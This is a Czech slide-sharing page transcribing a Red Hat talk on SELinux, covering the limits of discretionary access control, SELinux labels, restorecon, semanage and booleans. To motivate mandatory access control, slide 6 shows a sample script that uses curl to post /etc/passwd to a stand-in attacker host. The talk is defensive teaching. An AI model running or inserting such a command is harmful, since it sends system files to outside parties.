Prezentace se nahrává, počkejte prosím

Prezentace se nahrává, počkejte prosím

Se SELinuxem bezpečně Matěj Cepl Desktop Bugzapper – Red Hat, Inc. This presentation is made available under a Creative Commons Attribution-ShareAlike.

ZveřejnilMartina Žáková

Podobné prezentace

Prezentace na téma: "Se SELinuxem bezpečně Matěj Cepl Desktop Bugzapper – Red Hat, Inc. This presentation is made available under a Creative Commons Attribution-ShareAlike."— Transkript prezentace:

1 Se SELinuxem bezpečně Matěj Cepl Desktop Bugzapper – Red Hat, Inc. This presentation is made available under a Creative Commons Attribution-ShareAlike (BY-SA) 3.0 license.

2 Access Control Řízení přístupu (Access Control) V současné době Linux (a Unixy obecně) podporují DAC (Discretionary Access Control) Práva programu se řídí výlučně právem uživatele, který ho spustil.

3 Co funguje Nejnebezpečnější informace jsou chráněny: např. skripty spuštěné z Apache nemůžou číst /etc/shadow nebo normální uživatel nemá přístup k /var/log/secure. Uživatelé si nemohou navzájem číst svoje /home adresáře.

4 Co nefunguje NEDOSTATEČNÁ GRANULARITA! NEDOSTATEČNÁ GRANULARITA! – Všemocný root (jestliže se cracker stane rootem, obrana v podstatě skončila) – Práva pro aplikaci === práva uživatele – Není menší granularita nežli uživatel – Omezeno jenom na soubory Do souboru /etc/shadow smí zapisovat jenom program login, ale pouze pokud je spuštěn uživatelem root z programu passwd, ani root, ani login program ale do něho jinak zapisovat nesmí.

5 Co nefunguje (2) Takže třeba, co může Firefox číst? kmacmill firefox-bin -rw------- 1 kmacmill kmacmill.ssh/id_rsa (třeba flash ve Firefoxu) Nebo...

6 Co nefunguje (3) Může Apache zapsat a spustit tento skript? -rwxr-xr-x nobody /tmp/to-Russia-with-love a copak je v něm? $ cat /tmp/to-Russia-with-love #!/bin/sh curl --data "@/etc/passwd" \ http://very-bad-guys.ru/store.php

7 Krátká historie SELinuxu Interní projekty NSA na vytvoření MAC systémů, type enforcement, RBAC a MLS. 2000 – zveřejněna patch pro Linux 2003 – začleněna do kernelu 2.6.0-test3. Květen 2004 – součástí Fedora Core 2 – naprostý neúspěch (strict policy) Listopad 2004 – Fedora Core 3 – targeted policy (defaultuje do unconfined )

8 Mandatory Access Control Základem všeho jsou značky (u souborů xattr, proto je nutno pamatovat na zálohování) johanka:~$ ls -lZ /etc/resolv.conf -rw-r--r--. root root system_u:object_r:net_conf_t:s0 /etc/resolv.conf johanka:~$ User, role, type, úroveň v MLS Podobně pro uživatele a další objekty systému johanka:~$ id -Z staff_u:staff_r:staff_t:s0-s0:c0.c1023 johanka:~$

9

10 Současný SELinux Default SELinuxu je strict, ALE … … téměř vše unconfined – není rozdílu od situaci, kdy by SELinux nebyl. Pouze vyjmenované služby jsou confined. Jenom asi padesát programů vůbec ví o existenci SELinuxu. V posledních verzích Fedory pozvolný návrat ke klientským confined procesům (flash, sandbox, xguest).

11 Příklad Apache Samotný Apache program nebyl změněn. Správce systému má tři možnosti nastavení: zobrazovat soubory z ~/public_html a spouštět skripty? Cracker může jenom to, co Apache. Jestli Apache může pouze číst z /var/www/html, tak to je vše. Např. nemůže spouštět žádné skripty (nikdy, to nelze nastavit) z jiných adresářů nežli pro to označených.

12 Jak dopadnout špatně vim ~/resolv.conf mv ~/resolv.conf /etc ls -lZ /etc/resolv.conf Confined domény budou hlásit chyby přístupu k user_home_t restorecon /etc/resolv.conf

13 Základní fígly Na novém disku nebo při vypnutém SELinuxu # touch /.autorelabel ; reboot V případě problémů s labely # restorecon -v -R (mimochodem, restorecond(8) běží v pozadí)

14 Konfigurace (1) $ ssh -p 785 moje@nekde.cz ssh(1) je pochopitelně jednou z nejostřeji chráněných aplikací. # semanage port -a -t ssh_port_t -p tcp 785

15 Konfigurace (2) Mnohá nastavení SELinuxu jsou ovlivnitelná pomocí SE booleans(8), nastavení která ovlivňují některé části policy. # getsebool -a|grep sftp sftp_enable_homedirs --> off sftpd_anon_write --> off sftpd_full_access --> off sftpd_write_ssh_home --> off

16 Konfigurace (3)

17 Další projekty Jemné rozdělení práv v SELinuxu na každý objekt je využíváno i v jiných projektech: ● SE-PostgreSQL – http://code.google.com/p/sepgsql MAC na databázových objektech, granularita ● SVirt – http://selinuxproject.org/page/SVirt Confined (spoutané?) virtuální stroje

18 Další informace SELinux by Example, Prentice Hall 2006 Blog Dana Walshe http://danwalsh.livejournal.comhttp://danwalsh.livejournal.com Česká dokumentace pro SELinux (bakalářská práce Jana Horáka na IS MUNI), Česká dokumentace pro SELinux

19

Stáhnout ppt "Se SELinuxem bezpečně Matěj Cepl Desktop Bugzapper – Red Hat, Inc. This presentation is made available under a Creative Commons Attribution-ShareAlike."

Podobné prezentace

V této lekci se budeme brouzdat adresáři.

V této lekci se budeme brouzdat adresáři.
21. okruh GNU/Linux uživatelské účty, přístupová práva GUI, architektura X Windows, správce oken.

21. okruh GNU/Linux uživatelské účty, přístupová práva GUI, architektura X Windows, správce oken.
Windows 8 ZMVS. Windows 8 Nové 3D uživatelské rozhraní s kódovým názvem Wind. Nové uživatelské rozhraní bude požadovat minimálně 170MB video paměti a.

Windows 8 ZMVS. Windows 8 Nové 3D uživatelské rozhraní s kódovým názvem Wind. Nové uživatelské rozhraní bude požadovat minimálně 170MB video paměti a.
Exchange 2013 – Autodiscover - přehled

Exchange 2013 – Autodiscover - přehled
SOFTWARE operační systémy

SOFTWARE operační systémy
Přednáška č. 5 Proces návrhu databáze

Přednáška č. 5 Proces návrhu databáze
Bezpečnost v Linuxu Zpracoval: Roman Danel. Balíčkovací systém Způsob distribuce SW Ošetřuje a řeší závislosti Díky „podepisování“ balíčků nehrozí podstrčení.

Bezpečnost v Linuxu Zpracoval: Roman Danel. Balíčkovací systém Způsob distribuce SW Ošetřuje a řeší závislosti Díky „podepisování“ balíčků nehrozí podstrčení.
ZMVŠ. Bezpečnost Windows 8 Dynamic Access Control (DAC) Volně – Dynamický kontrolní přístup) rozšíření NTFS access control listů (ACL) o složitá pravidla.

ZMVŠ. Bezpečnost Windows 8 Dynamic Access Control (DAC) Volně – Dynamický kontrolní přístup) rozšíření NTFS access control listů (ACL) o složitá pravidla.
Tvorba webových aplikací

Tvorba webových aplikací
Co je Linux? Základní pojmy

Co je Linux? Základní pojmy
Přístupová práva, maska přístupových práv Jiří Hořejší.

Přístupová práva, maska přístupových práv Jiří Hořejší.
Gymnázium, SOŠ a VOŠ Ledeč nad Sázavou I NFORMAČNÍ A KOMUNIKAČNÍ TECHNOLOGIE Ing. Jan Roubíček.

Gymnázium, SOŠ a VOŠ Ledeč nad Sázavou I NFORMAČNÍ A KOMUNIKAČNÍ TECHNOLOGIE Ing. Jan Roubíček.
Adresářová služba Active directory

Adresářová služba Active directory
Maturitní okruh č. 7. Odstínit aplikace od specifik HWSpráva procesůSpráva pamětiSpráva souborůSpráva vstupů a výstupůSpráva sítěSystém ochrany a bezpečnostiSystém.

Maturitní okruh č. 7. Odstínit aplikace od specifik HWSpráva procesůSpráva pamětiSpráva souborůSpráva vstupů a výstupůSpráva sítěSystém ochrany a bezpečnostiSystém.
Zálohování a Disaster Recovery pro školy Aleš Hok +420 776 008 731

Zálohování a Disaster Recovery pro školy Aleš Hok
VLAN Projektování distribuovaných systémů Lekce 2 Ing. Jiří ledvina, CSc.

VLAN Projektování distribuovaných systémů Lekce 2 Ing. Jiří ledvina, CSc.
Příkazový řádek CMD.

Příkazový řádek CMD.
PHP – Základy programování

PHP – Základy programování
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Operating Systems Networking for Home and Small Businesses – Chapter.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Operating Systems Networking for Home and Small Businesses – Chapter.
Operační systémy.

Operační systémy.

Podobné prezentace

Reklamy Google